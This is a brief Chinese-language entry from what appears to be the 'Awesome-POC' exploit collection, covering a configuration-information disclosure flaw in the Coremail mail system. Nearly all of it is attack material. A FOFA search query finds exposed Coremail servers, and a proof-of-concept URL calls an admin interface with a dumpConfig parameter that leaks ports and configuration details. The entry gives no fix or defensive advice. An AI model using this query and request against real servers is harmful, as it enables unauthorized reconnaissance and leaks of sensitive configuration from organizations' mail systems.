Awesome-POC/Web应用漏洞/Coremail 配置信息泄露漏洞.md
2022-12-05 11:09:28 +08:00

392 B

Coremail 配置信息泄露漏洞

漏洞描述

Coremail 某个接口存在配置信息泄露漏洞,其中存在端口,配置信息等

漏洞影响

Coremail 配置信息泄露漏洞

FOFA

app="Coremail邮件系统"

漏洞复现

POC为

http://xxx.xxx.xxx.xxx/mailsms/s?func=ADMIN:appState&dumpConfig=/